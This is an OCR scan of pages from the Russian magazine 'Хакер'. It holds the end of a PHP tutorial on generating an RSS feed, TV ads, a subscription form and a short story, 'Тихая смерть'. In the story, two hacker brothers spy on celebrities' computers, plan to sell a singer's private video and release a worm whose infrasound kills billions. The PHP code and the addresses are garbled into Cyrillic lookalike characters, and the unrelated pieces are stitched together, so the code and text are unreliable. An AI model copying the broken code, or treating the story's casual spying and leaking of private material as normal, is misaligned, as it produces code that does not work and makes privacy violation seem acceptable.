посты, которые нам надо выводить в РЗЗ- 
ленту. Написать скрипт, который будет до- 
бавлять новости в таблицу, — это элемен- 
тарно, и мы с тобой это уже не раз прово- 
рачивали. Так что я сегодня более подроб- 
но расскажу об экспорте данных. 

Все очень просто. Скачала элементарным 
запросом мы выбираем десять последних 
записей, сортируя их по времени публика- 
ции, а затем в цикле по всем возвращенным 
строкам начинаем строить РЗЗ-документ, 
жестко следуя описанному формату. В ре- 
зультате несложно получить примерно та- 
кую вот функцию: 

[процедура, строящая В58-ленту] 

*ипс*іоп ВиіІсІВзз($ШІе, $1іпк, $сІезс) { 
$ге=туздІ_диегу("зеІес* * *гот гззЫод 



огсіег Ьу рісі безе Ііті* 100"); 

есГіо "<?хтІ ѵегзіоп=\"1 .0\" епсосІіпд=\"ѵѵіп- 

боѵѵз-1251\" ?>\п”; 

есГіо "<гз5 ѵегзіоп=\ м 2.0\"> 

<сІіаппеІ> 

<Ш1е>$Ш1е</т1е> # Заголовок ленты 
<Ііпк>$Ііпк</Ііпк> # Ссылка на сайт 

# Описание ленты 
<безсгір*іоп>$безс</безсгір*іоп>”; 

# Цикл по всем нужным записям в таблице 
ѵѵГііІе($гез=туздИе*сГі_аггау($ге)) { 

есГіо 11 

<і*ет> # Новый пост 
<ШІе>$гез[ШІе]</ШІе> # Заголовок 
<Ііпк>$гез[Ііпк]</Ііпк> # Ссылка 

# Описание 

<безсгір*іоп>$гез[безск]</безсгір*іоп> 

# Дата публикации 
<риЬ0а*е>$гез[риЬ0а*е]</риЬ0а*е> 

# Идентификатор 

<диіб>$Ііпк/соп*еп*.рГір?ріб=$$гез[ріб]</диіб> 

</і*ет>"; 

} 

есГіо "</сГіаппеІ> 

</гзз>"; 

} 

Теперь, если сохранить эту процедуру 
в рГір-скрипте и выполнить ее на серве- 
ре, клиенту вернется РЗЗ-документ, ко- 
торый удобнее всего просматривать 
при помощи специальной программы 
вроде АсГіѵеРеІтѳзГі. На скрине видно, 
каким образом отображаются новости 
в клиентском софте. Ты и сам можешь 



легко это попробовать, адрес ленты: 
Іі іір ://ігесІ. іпіпз. ги/гзз.ріір . 

[выводы] Согласись, все просто элементар- 
но! По большому счету, создать РЗЗ-ленту ни- 
чуть не сложнее, чем сформировать, ска- 
жем, ГіГтІ-таблицу: нужно лишь знать грамма- 
тику языка, а расположить в нужной последо- 
вательности тэги — это совсем не сложно. 
Сегодня мы с тобой научились экспорти- 
ровать данные в Р55, и будь уверен — если 
ты добавишь на своем проекте возмож- 
ность получать публикации в этом форма- 
те, это здорово поднимет рейтинг твоего 
ресурса. Дерзай! © 



[КАК НАПИСАТЬ СВОЙ 
В88-КЯИЕНТ?] 

В самом деле, как сделать свой 
собственный ВЗЗ-клиент на РНР и 
как он может выглядеть? Примерно 
так. Это обычный сценарий, который 
при выполнении получает с удален- 
ного сервера актуальный ВЗЗ-файл 
и, обрабатывая его встроенным в 
РНР хплі-парсером, генерирует кра- 
сиво размеченный ГіІплІ-документ. Тут 
рационально добавить поддержку 
нескольких лент сразу и кэширова- 
ние информации, чтобы не перекачи- 
вать каждый раз ВЗЗ-ленту заново. 
Время, в течение которого информа- 
ция актуальна, можно получать из 
параметров ВЗЗ-блога: оно обычно 
указывается в элементе <ИІ>. 








охотники за модой 

гид по стилю 

новое шоу по субботам в 21 .00 |Г1 лПО 

звезда танцпола 

новое реалити-шоу іо будням в 21 .00 
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Тихая смерть 

ПРОФЕССОР АЛАН БЭНЧЕР ВЕСЬ ДЕНЬ НА- 
ХОДИЛСЯ В ВОЗБУЖДЕННОМ СОСТОЯНИИ. 
ОБЫЧНО ВСЕГДА СПОКОЙНЫЙ И СКОНЦЕНТ- 
РИРОВАННЫЙ, ТЕПЕРЬ ОН НОСИЛСЯ ПО КА- 
БИНЕТУ И ПОСТОЯННО ЧТО-ТО БОРМОТАЛ 
СЕБЕ ПОД НОС. БОББИ НЕ ЗНАЛ, ЧЕМ ВЫЗ- 
ВАНА ТАКАЯ ВЗВИНЧЕННОСТЬ, НО ПОДОЗРЕ- 
ВАЛ, ЧТО ЭТО ИМЕЕТ ОТНОШЕНИЕ К ПРОЕК- 
ТУ, НАД КОТОРЫМ РАБОТАЛ ПРОФЕССОР. 
ЧТО-ТО СВЯЗАННОЕ С ИЗУЧЕНИЕМ ВЛИЯНИЯ 
ЗВУКА НА ЧЕЛОВЕЧЕСКИЙ МОЗГ. БОББИ БЫЛ 
ВСЕГО ЛИШЬ ЛАБОРАНТОМ И ДЕЛАЛ, ЧТО 
НАЗЫВАЕТСЯ, ВСЮ ГРЯЗНУЮ РАБОТУ. ПРО- 
ФЕССОР НЕ ПОСВЯЩАЛ ЕГО В СВОИ ПРОЕК- 
ТЫ, А БОББИ НИКОГДА НЕ СПРАШИВАЛ ОБ 
ЭТОМ. НО ЕМУ БЫЛО ЛЕСТНО, ЧТО ЕГО ОП- 
РЕДЕЛИЛИ РАБОТАТЬ С ТАКИМ ГЕНИАЛЬНЫМ 
УЧЕНЫМ, КАК АЛАН БЭНЧЕР. 

К КОНЦУ РАБОЧЕГО ДНЯ ПРОФЕССОР ПОДО- 
ШЕЛ К БОББИ И ПРОТЯНУЛ ЕМУ ЗАПЕЧАТАН- 
НЫЙ ПЛАСТИКОВЫЙ ПАКЕТ. НА ПАКЕТЕ СТО- 
ЯЛ ГРИФ «СОВЕРШЕННО СЕКРЕТНО», А УСТ- 
НАЯ ИНСТРУКЦИЯ БЫЛА КРАТКОЙ: 

— ОТВЕЗЕШЬ ЭТО КРОМВЕЛЮ, ОТДАШЬ ЕМУ 
ЛИЧНО В РУКИ. ПРЯМО СЕЙЧАС. СТУПАЙ. 
БОББИ ЗНАЛ, ЧТО ОБЫЧНО ПРОФЕССОР 
БЭНЧЕР СВЯЗЫВАЛСЯ С РУКОВОДИТЕЛЕМ 
ЛАБОРАТОРИИ ПО ВНУТРЕННЕЙ ЭЛЕКТРОН- 
НОЙ ПОЧТЕ. ЕСЛИ ОН ПРЕДПОЧЕЛ ПЕРЕ- 
ДАТЬ КОНВЕРТ ЕМУ В РУКИ, ЗНАЧИТ, ТО, 

ЧТО СОДЕРЖАЛОСЬ ВНУТРИ, ИМЕЛО БОЛЬ- 
ШУЮ ЦЕННОСТЬ I тіпсІ\л/Огк (тіпсІ\А/Огк@датѳІапсІ.ги) 

Лаборатория физико- 
оптических исследований 
ЫАЗА, штат Пенсильвания 

Ргот: ВісГюгсІ СготѵѵеІІ 

гсгот\л/еІІ@па$а.доѵ 

То: Реап ЗТапІеу $ТапІѳу@сІагра.тіІ 

Дин, похоже, нашей лаборатории уда- 
лось добиться кое-каких успехов в проек- 
те «Тихая смерть». Практические экспери- 




менты проводились пока только на грызунах, поэтому результаты 
не могут считаться завершенными. Мы также не знаем, какие мо- 
гут быть побочные эффекты. В прилагающемся материале со- 
держатся документы о прогрессе за последние три месяца, ре- 
зультаты опытов на домашних животных и часть исходного кода 
без детонирующих строк. 

С уважением, Ричард Кромвель. Глава исследовательской ла- 
боратории ЫА5А в Пенсильвании. 




Андрей откинулся на спинку кресла и размял мышцы. От долго 
сидения за компом у него иногда начинались боли в ногах, поэ- 
тому в последнее время он взял за привычку по утрам делать не- 
большую пробежку вокруг района. Сегодня он сачканул, и боли 
снова дали о себе знать. Рядом с ним за другим компом сидел 
брат и с поразительной скоростью набивал строчки кода в ас- 
семблере. Сколько себя помнил Андрей, они с Витькой постоян- 
но спорили, кто лучше разбирается в компьютерах, пытались 
обставить друг друга. Но потом поняли, что спорами ничего не 
добьешься, а если объединиться, они будут отлично дополнять 
друг друга и их возможности увеличатся на порядок. Оба брата 
могли назвать себя зесигіГу-экспертами, но у каждого была своя 
специализация. Андрей был железячником — мог с закрытыми 
глазами собрать и разобрать компьютер, спаять любую схему и 
проконсультировать по поводу любого нового гаджета. Он также 
имел углубленные познания в криптографии и немного увлекался 
фрикингом. Витя, в свою очередь, имел врожденные программе- 
рские способности и с детства ковырял софт, разбирая его по 
полочкам и изучая, какие алгоритмы использовали авторы. Он 



і 




мог за час написать программу, на которую некоторым серти- 
фицированным программистам требовались месяцы упорного 
труда. Стоило подумать о задаче, как код моментально появлял- 
ся в голове, на том языке, который лучше всего подходил для ре- 
ализации. Тяга к электронике и компьютерам пришла к ним от от- 
ца, который был одним из пионеров, проложивших интернет в 
России. Работал он обычно дома за компом, и сыновья, вернув- 
шись из школы, постоянно доставали его вопросами обо всем, 
пытаясь вникнуть в то, чем он занимался. Со временем отец ку- 
пил им отдельный компьютер, с этого все и началось. 

В двадцать лет братья оставили родительский дом и сняли неболь- 
шую квартирку на отшибе. В кармане у них было около полштуки 
баксов, а в голове — тщательно продуманный план. Несмотря на 
то что они уважали отца, они не хотели, как и он, работать на госу- 
дарство и зарабатывать копейки. Работать на дядю, который 
пусть даже неплохо платит, им тоже казалось плохой идеей. Поэ- 
тому они решили создать свой бизнес по оказанию различных вы- 
сокотехнологичных услуг обеспеченным клиентам. Причем услуги 
могли быть самые разные. Труднее всего было найти первых кли- 
ентов. После того как братья зарекомендовали себя, клиенты ста- 
ли находить их сами. И с каждым разом заказы становились все 
серьезнее, а денег приносили все больше. Теперь это уже было 
не снятие защиты с корпоративной программы и не проверка 
сайта на взломоустойчивость, а расшифровка военных докумен- 
тов и перехват информации, за которую запросто могли убить. 
Андрей прошел на кухню и достал из холодильника две бутылки пива. 

— Витька, Тинькофф будешь? 

— Вполне, — ответил тот своим любимым словечком. 

Захватив заодно фисташки и сушеных кальмаров, Андрей вер- 
нулся в комнату, которая обоим служила рабочим кабинетом. В 
отличие от их первой комнатушки, это были просторные апарта- 
менты, вмещающие кучу всевозможных гаджетов, электронных 
систем и два сдвинутых почти вплотную компьютерных места. Ра- 
ботать вдвоем было намного удобнее, так как всегда можно бы- 
ло посоветоваться друг с другом по любому поводу. 

— Чего строчишь? — глядя на быстро появляющиеся на экране 
строки, спросил Андрей. 

— Новый эксперимент. 

— Снова червь? 

— Угу. 

— В прессе писали, что твой последний эксперимент обошелся 
МісгозоІТ в два миллиарда. 

— Да не, на этот раз все будет безобидно. Если все так, как я ду- 
маю, мой червячок станет самым быстрым в плане размножения 
за всю историю. 

— Если это так, им могут заинтересоваться клиенты. 

— К черту клиентов. Если в него встроить деструктивные части, 
двумя миллиардами дело не обойдется. Это для себя. И я не со- 
бираюсь запускать его в Сеть. 

— А как ты собираешься проверить его скорость? 

— Пущу его в четвертый кластер и ограничу размножение только 
компами, которые в него входят. 

Так они нумеровали сети, состоящие из определенного количе- 
ства компьютеров-зомби. С помощью одного такого кластера 
можно было без проблем вывести из строя крупный сервер или 
забрутфорсить сложный криптошифр. Четвертый кластер был 
самым маленьким и состоял из полутора тысяч компьютеров. 
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ІАндрей еще некоторое время смотрел на экран, оценивая ре- 
Ішения, которые использовал Витя. Его всегда поражало, как брат 
может программировать настолько быстро. Сам он неплохо вла- 
дел несколькими языками, но для написания программы ему тре- 
бовалось составить план и обдумать программную реализацию 
своих идей. Витя, казалось, все обдумывал на ходу, и пальцы ед- 
ва успевали воплощать в ассемблере то, что творилось у него в 
голове. Иногда Андрею казалось, что его брат — лучший прог- 
раммист в мире, и у него были все основания так считать. 
Наконец он оторвался от этого процесса и сел за свой комп. Они 
вдвоем только что выполнили крупный заказ и теперь могли отдох- 
нуть, занявшись своими делами. Отхлебнув из бутылки, Андрей 
запустил сканер, написанный братом и проверяющий состояние 
машин с внедренными жучками. Андрей любил оставлять их на 
компьютерах влиятельных людей — звезд шоу-бизнеса, предста- 
вителей правительственных и военных организаций. Конечно, в 
случае с последними он играл с огнем, но путь от его компьюте- 
ра к компьютеру этих людей проходил через длинную вереницу 
проксей. К тому же каждый из шпионящих зверьков был замаски- 
рован под файл системного процесса и не вызывал подозрений. 
Зайдя первым делом на компьютер Бритни Спирс, Андрей стал 
свидетелем ее трепа по АІМ с одним из бывших любовников. Па- 
рочка увлеченно вспоминала, как занималась сексом на вилле 
певицы в Калифорнии в то время, как все газеты писали о ее свя- 
той непорочности. Также на ее компе он еще неделю назад обна- 
ружил приватную порнушку с участием звезды. Порнокомпании 
отдали бы за нее любые деньги, и в недалеком будущем Андрей 
собирался передать ее заинтересованным лицам — развратная 
деваха этого заслуживала, да и лишний скандал в качестве пиа- 
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ра ей не помешает. Разговор Бритни и бойфренда постепенно пе- 
решел на малоинтересные сплетни, и Андрей закрыл сеанс. 



Вечером того же дня Алан Бэнчер сидел у себя дома в кресле перед 
телевизором и смотрел канал Эізсоѵегу. Ведущий на экране рас- 
сказывал о чудесах дикой природы, но профессор не слышал его. 
В его мозгу переваривались мысли по поводу утреннего открытия. 
Алан занимался изучением звуков с первого курса Гарварда и с 
тех пор стал одним из ведущих специалистов в этой области. Он 
специализировался на исследованиях инфразвука и его влиянии 
на организм живых существ. Доклады профессора Бэнчера бы- 
ли известны на весь ученый мир, и, по слухам, его даже собира- 
лись номинировать на Нобелевскую премию. Долгое время он 
работал и преподавал в Гарварде, но потом один из выпускни- 
ков, служащий теперь в Министерстве обороны, предложил ему 
пост ведущего специалиста в лаборатории звуковых исследова- 
ний ІЧАЗА. Свое решение Алан обдумывал долго. С одной сторо- 
ны, он прожил в Гарварде почти всю свою жизнь, и ему нравилось 
преподавать. С другой — Бэнчер понимал, что работа на такую 
организацию, как МАЗА, даст ему возможность наиболее полно 
реализовать свой ученый потенциал. Ведь там ему будет предос- 
тавлено все необходимое оборудование, неограниченные фи- 
нансовые возможности, и все свое время он сможет посвящать 
исследованиям. Алан никогда не был женат, и ему не нужно бы- 
ло объясняться с семьей. Так что, по сути, в Гарварде, кроме сту- 
дентов, его ничто не держало. Наконец он принял решение... 
Проект «Тихая смерть» стартовал полгода назад. Во всей лабора- 
тории, насчитывающей сорок шесть сотрудников, о нем, кроме 
Алана, знал только шеф Ричард Кромвель. Финансированием про- 
екта занимались военные структуры, и раз в три месяца Алан отсы- 
лал отчеты по своей работе. Конечной целью являлось получение 
в лабораторных условиях инфразвука громкостью не более пяти 
децибел, способного воздействовать на организм живых существ. 
Случаев использования инфразвука, оказывающего разрушитель- 
ное влияние на людей, в истории было предостаточно. В пятидеся- 
тые годы прошлого столетия в одном из театров Лондона показыва- 
ли историческую пьесу и для нагнетания атмосферы в одной из час- 
тей использовали длинную широкую трубу, подключенную к органу. 
Эффект от звучания превзошел все ожидания — звука от трубы со- 
вершенно не было слышно, но в зале задрожали все канделябры, а 
зрителей безо всякой причины охватил панический ужас. Представ- 
ление провалилось, так как все люди в страхе бросились на улицу. 
Эксперименты по воздействию на человека инфразвуком часто- 
той 6 - 9 Гц давно показали, что в этом случае нарушается синх- 
ронизация внутренних биоритмических процессов, что приводит 
в лучшем случае к потере координации, притуплению умствен- 



ной деятельности, болям, стрессу, а в худшем — полной оста- 
новке сердца. Для того чтобы убить человека звуком, необходи- 
мо соответствующее оборудование с мощными усилителями, 
способными выдавать более 120 децибел. Задача Алана заклю- 
чалась в том, чтобы при намного меньшей громкости инфразвука 
сохранить его разрушительную силу. Теоретически он знал, как 
этого можно добиться. Тело человека само по себе могло стать 
усилителем инфразвуковой волны, нужно было только рассчи- 
тать начальную амплитуду колебаний звука. Именно это и было 
основной проблемой, так как добиться правильных расчетов не 
удавалось даже с помощью суперкомпьютера. Морские свин- 
ки, над которыми профессор проводил свои исследования, ес- 
ли и умирали, то только в результате болезни. 

Бэнчер уже вот-вот был готов сдаться и писать рекомендацию о 
закрытии проекта, но утром произошло нечто невероятное. При- 
дя в свою лабораторию, он сразу заметил, что животные в изоли- 
рованной камере просто с ума сходят, бросаясь друг на друга. 
Профессор помнил, что оставил накануне компьютер включен- 
ным и звуки, им запрограммированные, посылались в камеру. Но 
при нем они не производили на свинок никакого эффекта. Когда 
Алан сел за рабочее место, то обнаружил, что в программе про- 
изошел сбой и звук попросту заклинило, с полусекундной часто- 
той он повторялся снова и снова. Громкость была минимальной, 
и профессор решил плавно ее увеличивать, проверяя реакцию 
животных. С каждым поворотом тумблера грызуны становились 
все агрессивнее, а их сердцебиение на датчике зашкаливало. 
Когда звук достиг громкости пяти децибел, сравнимой с шепо- 
том, животные замерли. Выключив звук, профессор подбежал и 
распахнул дверцу камеры. Морские свинки были мертвы. 

Алан не мог поверить, что простое зацикливание привело к воз- 
никновению той самой амплитуды, тем не менее, результат он ви- 
дел собственными глазами. На найденной зацикленной частоте 
громкостью пять децибел живые организмы умирали в течение 
считанных секунд. Словно она была командой для мозга прек- 
ратить всякую жизненную деятельность. 

Для окончания проекта оставалось провести исследования вли- 
яния звука на человека. Алан собирался попросить руководите- 
ля лаборатории Ричарда Кромвеля обеспечить его парой тю- 
ремных смертников, согласившихся на эксперименты над со- 
бой. Но сделать это нужно было только для галочки — профес- 
сор знал, что с людьми ситуация будет аналогичной. 

На минуту его внимание сфокусировалось на экране телевизо- 
ра. Дискавери показывал детей, играющих с детенышами живот- 
ных на фоне красочного пейзажа. При виде этой идиллии Бэнча- 
ра охватила тревога. Он так долго работал над своим проектом, 
но никогда не задумывался, как его открытия могут повлиять на 
мир. Ведь в плохих руках «Тихая смерть» может стать самым опас- 
ным оружием за всю историю человечества. Мысли об этом не 
покидали Алана всю ночь, и до самого утра он проворочался, 
безуспешно пытаясь заснуть. 



— Нихрена себе! Иди сюда! - услышал Витя из-за соседнего стола. 
Андрей не отрывал глаза от монитора и, когда брат подошел, 
ткнул пальцем в экран. 

— Только что скачал это с компа одного вояки. 

— Что это? 

— Документы по поводу каких-то совершенно секретных разра- 
боток в области звука. 

— Каких разработок? 

— Ну я еще толком не вникал, но похоже, чуваки планируют соз- 
дать новое звуковое оружие. Я выудил это из его почтового ящи- 
ка, письмо было зашифровано несложным шифром. Самое ин- 
тересное идет в аттаче, там по твоей части. 

Андрей открыл архив и запустил файл с расширением .с. Перед 
братьями появился исходный код на языке С. Едва глянув на него, 
Витя утвердительно кивнул: «Да, явно по части саунда». 

Вся программа занимала от силы восемьдесят строк, но в ней 
имелась куча сложных математических функций. 

— Она не закончена, — вынес резюме Витя. — Нет одного фраг- 
мента. 

— То есть мы ее не запустим? 

— Неа. 

— Можешь определить, что она делает? 

— Просто отдает команды звуковой плате генерировать опреде- 
ленные шумы. Каким-то особо извращенным способом. 

— Что за шумы? 



— Я почем знаю? 

— Витек, это что-то важное. Иначе бы оно не шифрова- 
лось и не шло по сабжем «Совершенно секретно». 

Витя ткнул пальцем в одно место в исходнике, где была 
последовательность цифр и букв. 

— Похоже, это название программы. Только в шестнадца- 
теричной системе счисления. 

— Можешь прочитать? 

— Уже. Там написано «Тихая смерть». 

Андрей присвистнул. 

— Слушай, может, нам удалить все это от греха подаль- 
ше? Кто знает, чего там вояки изобрели. 

— Да не, стой. Я хочу воспроизвести оригинал. 

— В смысле? 

— Можно попытаться на основе этих фрагментов воссоз- 
дать всю программу целиком. 

— Как? — Андрей рассмеялся. 

— Да говорю тебе, вполне. Ты же можешь расшифровать 
сообщение, в котором отсутствует большая часть букв? 

— Ну, зависит от количества отсутствующих букв и того, 
какие буквы отсутствуют. 

— Так и здесь. В основном фрагменте были инструкции 
командам, которые есть в нашем куске. Мы видим, ка- 
кие команды они выполняют, и можем написать соотве- 
тствующие инструкции. Все элементарно. 

— Может быть, там были не только команды? 

— Что там было, подскажет наш кусок. Дай-ка. 

Витя отодвинул брата и устроился за его рабочим мес- 
том. Пальцы привычно забегали по клавиатуре, набивая 
код. Через пять минут Витя остановился. 

— Все. 

— Все? 

— Все. 

— Ну запускай тогда. 

— Уверен? 

— Давай, не томи. 

Витя откомпилировал код и запустил экзешник. Из коло- 
нок послышался еле слышный шум. 

— Прибавь громкости. 

Витя добавил звуку, но шум все равно был тихим. Эдакий 
протяжный, заунывный свист, который мог хорошо под- 
ходить для озвучивания мрачного подземелья. 

— Действительно, похоже на смерть. 

Андрею стало немного не по себе. 

— Вырубай эту какофонию. 

Звук затих, но ребята невольно почувствовали диском- 
форт. 

Андрей поежился. 

— Я всегда говорил, что эти военные чокнутые. 

Витя задумчиво сидел. Потом снова открыл исходник и 
стал внимательно его изучать. 

— Что там? — поинтересовался брат. 

— Знаешь, у меня такое ощущение, что я что-то упустил. 

— Что именно? 

— Пока не знаю. Просто чувствую. Ладно, пойду червя- 
ка своего дописывать. Завтра будем запускать. 

— Окей. Я пока фильмец гляну. 

Ггот: Реап ЗТапІеу $ТапІеу@багра.тіІ 

То: ІЗісНагсІ Сгот\л/еІІ гсгот\л/еІІ@па$а.доѵ 

Мы удовлетворены предварительными результатами. 
Держите нас в курсе всех подробностей проекта «Ти- 
хая смерть». 

Дин Стэнли /ЭАРРА 



Пока брат еще спал в обнимку с плюшевым ВЗЭ-демо- 
ном, Андрей с утра сделал пробежку, сгонял в универ- 
сам за продуктами и приготовил им обоим завтрак. 
Обычно они питались полуфабрикатами, предпочитая 
не тратить время на приготовление пищи, но в это утро 
на улице было так свежо и приятно, что Андрею захоте- 
лось сделать что-то особенное. Этим особенным была 
жареная картошка с окорочками, зеленым горошком и 
салат, собственноручно сварганенный из огурцов, ка- 
пусты и помидоров. 

— Ты не забыл, сегодня идем на сходку? — поинтересо- 
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вался Андрей за завтраком. 

Витя поморщился. Под сходкой подразумевалась встреча юник- 
соидов с одного опенсорсного портала, которая проходила 
каждые две недели. Первое время они вдохновляли Витю, и он хо- 
дил на них с удовольствием, но, перезнакомившись со всеми 
постоянными участниками, понял, что делать ему там особо нече- 
го. Ему хотелось общаться с кем-то, у кого можно чему-то научить- 
ся, но на сходках он обычно учил остальных сам. Брат в этом пла- 
не был отзывчивей и с удовольствием объяснял технические пре- 
мудрости новичкам. Встречи проходили практически всегда в од- 
ном месте — баре «Веселый Роджер», были шумными и веселы- 
ми, а все темы разговоров вращались вокруг компьютеров и ІІІМІХ. 
Братья всегда были желанными гостями на любой юниксовке. 

— Никаких отмазок. Хоть проветришься. 

— Андрюх, реально неохота. К тому же, я хочу дописать сегодня 
червяка. 

— Ну ничего страшного, оторвешься на пару часиков. 

— Знаю я ваши «пару часиков». Три часа бесполезного трепа, а 
потом два часа еще более бесполезной пьянки. Иди один, окей? 

— Окей, — вздохнул Андрей. 



Андрей вернулся в отличном настроении. 

— Ну как прошло? — не отрываясь от компа, спросил Витя. 

— Класс. Жаль, тебя не было. Там новая девчонка стала ходить, 
вообще супер. Мы с ней мило так пообщались. 

Витя хмыкнул. 

— Стрельнул у нее телефончик, надо будет позвонить. 

— Валяй. 

— Как твой червь? 

— Готов. Иди зацени. 

Андрей повесил куртку на вешалку и вошел в комнату. На экране 
без какой-либо упорядоченности был набросан код, в котором 
даже хорошему программисту было сложно разобраться. 

— В общем, пока ты там телефончики стрелял, я тут добавил пару 
функций. Теперь он, во-первых, кроссплатформенный и может за- 
ражать тачки с несколькими писишными осями — виндой, фряхой, 
линухом, соляркой, макос и другими. Во-вторых, теперь он расп- 
ространяется не только в инете, но и через мобильные системы. 

— Как? 

— Способов несколько. Через $МЗ/ММЗ-шлюзы и блютус. Также 
на зараженном компе постоянно сидит жучок, который отслежи- 
вает подключение к определенному порту, и если юзер надума- 
ет поменять прошивку или закачать на свой смартфон новых иг- 
рушек — вуаля. Еще через недавно найденный баг в ЗутЬіап 05. 



В общем, круче могут быть только горы. 

ІВитя с гордостью посмотрел на неразборчивый исходник. 

" — Ты же говорил, что дальше четвертого кластера он не уйдет? 

— А он и не уйдет. Это пока экспериментальная версия. 

■ Про безопасность не забыл? 

— За идиота держишь? Все следы ведут на тайваньский вирь- 
мейкерский сайт. Будет кому-то слава... 

— И что твой червячок делает? 

— Да ничего, в общем-то. 

— Вообще ничего? 

— Ну я пока писал алгоритмы размножения, думал все осталь- 
ное на потом оставить. 

— Давай что-то безобидное вставим, чтоб не получилось, как в 
прошлый раз. У меня где-то был гиф анимированный с Родже- 
ром. Он там клево хлебалом щелкает. 

— Отлично. И в качестве фона что-то нужно... зловещее. 

Они многозначительно переглянулись. 

— Ее? 

— Ну а что? Вполне зловеще. 

Братья взялись за дело. Пока Андрей искал на компе тот самый 
гиф, Витя вставлял в код червя фоновый шум из военного архива. 
Все время, пока он возился с ним, его не оставляло ощущение, 
что он что-то забыл. Он знал, что код верный, просто где-то отсу- 
тствует маленькая, но важная составляющая. Витя стал просмат- 
ривать код шума снова, но как он ни пытался определить, в чем 
дело, решения не находил. 

— Есть! — Андрей щелкнул пальцами и добавил: — Заливаю тебе 
в аплоад. Там в папке ѲІЕ. 

Вставить картинку, чтобы она высвечивалась вместе с фоновым 
шумом после первой перезагрузки зараженного компа, заняло 
у Вити не больше пяти минут. Еще некоторое время братья обсуж- 
дали, как назвать нового червяка. 

— А что, «Тихая смерть» — неплохое название для безобидной 
зверушки, — наконец предложил Андрей. 

— Вполне, — согласился Витя, и еще одна строка в исходнике 
дала электронному зверьку имя. 

— Вроде, все готово. 

— Ничего не забыл? 

— Да вроде, нет. 

— Ну, тогда будем запускать? 

Витя еще раз просмотрел код. В последний момент, глядя на 
фрагмент шума, его осенило. Руки сами набрали нужные строч- 
ки, а затем нажали «Откомпилировать». Оставалось только за- 
пустить получившийся экзешник. 

Витя навел на него курсор и клацнул «Епіег». 

— Я, похоже, понял, чего не хватало в том коде, — после этого 
сказал он. 

— Чего же? — поинтересовался Андрей. 

— Запрограммированный шум был чистым. Но в одной из строк со- 
держался цикл. Я сначала подумал, что эта формула циклическая 
сама по себе. Но потом дошло, что она — лишь часть всего цикли- 



ческого процесса. То есть звук не может быть чистым, он 
построен на определенных прерываниях. В одной из формул 
был подсказка, с какой частотой шло прерывание. 

— Нифига не понял. Ты что, подправил код того шума? 

— Ага. 

— И что, он теперь дергается каждые, сколько там, секунд? 

— Каждые полсекунды. Мы можем послушать оригинал. 
Андрей пожал плечами, и Витя просто перезагрузил свою ма- 
шину, которая стала первой зараженной червем. Система 
быстро загрузила ядро, заставку, системные процессы, зГаіТир- 
скрипты и программы в стартапе. В конце концов процесс заг- 
рузки ОС был закончен, и из динамиков раздался еле слышный 
прерывистый шум, за которым последовало изображение бе- 
лого скелета с костями на черном фоне, злорадно открываю- 
щего пасть. Но увидеть ее ни Андрей, ни Витя не успели. К тому 
времени как веселый Роджер во второй раз захлопнул челюсть, 
оба брата были уже мертвы. А последнее, что внезапно приш- 
ло в голову Вите, перед тем как инфразвук остановил его серд- 
це, была мысль, что он все-таки забыл поставить ограничение 
на распространение червя. 

[месяц спустя] Бомж Степан перевалился с одного бока на 
другой и с недоумением посмотрел на мужчину, опустивше- 
го рядом с ним переносной телевизор. В последние несколь- 
ко недель в городе творилось черт-те что. Мусорные ящики, 
которые раньше наполнялись пищевыми отходами и стары- 
ми вещами, теперь были доверху наполнены всевозможной 
аппаратурой. Мобильные телефоны всех моделей и расцве- 
ток валялись повсюду: некоторые — искореженные и разби- 
тые, некоторые — сияющие новизной. А из домов, не перес- 
тавая, вывозили трупы. Их выносили постоянно, сгружали в 
машины и увозили непонятно куда. Степан не понимал, что 
происходит, и это его пугало. Не было никого, кто мог объяс- 
нить ему все эти смерти и выброшенную аппаратуру, кото- 
рую раньше он видел только на прилавках. Он давно перес- 
тал контактировать с людьми, перебиваясь чем Бог пошлет. 
Степан еще раз посмотрел на оставленный рядом телеви- 
зор. Обычно всю технику выбрасывали не жалея, со 
злостью. А этот просто оставили рядом. В далекой жизни, от 
которой остались только обрывки воспоминаний, у Степа- 
на был телевизор, поэтому он знал, как его включить. Бата- 
рея еще была не до конца разряжена, телевизор загорел- 
ся, появилась картинка ведущей и ее голос. Многое из того, 
что услышал дальше Степан, было выше его понимания. 

— Количество жертв вируса «Тихая смерть», несмотря на все 
предостережения, продолжает расти. По приблизительным 
подсчетам его жертвами уже стали более полутора милли- 
ардов человек во всем мире, что превышает число жертв во 
всех войнах за всю историю человечества. Маленькая 
компьютерная программа, автор которой до сих пор неиз- 
вестен, словно смерч пронеслась по миру, оставляя за со- 
бой только смерть. Подобной катастрофы не ожидал никто, 
ее масштабы поражают. Больше всего пострадали высоко- 
развитые государства, такие как США, Япония, Канада, Гер- 
мания. Россия не стала исключением. На улицах крупных го- 
родов проходят постоянные демонстрации с требованием 
уничтожить все компьютеры, мобильные телефоны и все дру- 
гие источники заразы. Миллионы людей, которые еще месяц 
назад не представляли своей жизни без технологий, теперь 
стали на сторону борцов против любых их проявлений. 
Ведущие компании — производители компьютерного и те- 
лефонного оборудования обанкротились за считанные дни. 
Трудно сказать, как скоро мир оправится от подобного пот- 
рясения и оправится ли вообще. 

Еще раз предупреждаем всех вас, ради вашей же безопас- 
ности: не пользуйтесь компьютерным оборудованием и мо- 
бильными телефонами. Вирус не нейтрализован и продол- 
жает искать новые жертвы. 

Марина Ковалева. «Вести». Москва. 

Степан задумчиво слушал и, когда ведущая закончила, вык- 
лючил телевизор. Поднявшись с земли, он облизал потрес- 
кавшиеся губы и, опираясь на палку, отправился дальше. Он 
пережил вирусы и бактерии похлеще этой, как ее там, мол- 
чаливой смерти. Так что им его не запугать. 

Мир вокруг продолжал сходить с ума. 
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ГАРАНТИЯ 
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Заказ удобно оплатить через любое отделение банка. 
Заказ осуществляется заказной бандеролью 
или с курьером 



«Хакер» + 2 СО 



Стоимость заказа на «Хакер» + 2 СО или «Хакер» + ОѴО 



«Хакер» + РѴР 




за номер 

(экономия 30 руб.*) 



за 6 месяцев 

(экономия 180 руб.*) 

за 12 месяцев 

(экономия руб.*)Ѵ 




за номер 

(экономия 30 руб.*) 

за 6 месяцев 

(экономия 180 руб.*) 

за 12 месяцев 

(экономия ©I]© руб.*) 



Стоимость заказа на комплект «Хакер» + «Железою 



189р 

1071р 

2016р 



комплект на 1 месяц 

(экономия 80 рублей* *) 

комплект на 6 месяцев 

(экономия 480 рублей*) 

комплект на 12 месяцев 

(экономия ‘08Й® рублей*) 



* экономия от средней розничной цены по Москве 
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Адрес (с индексом) 




Назначение платежа 

Оплата за « » 

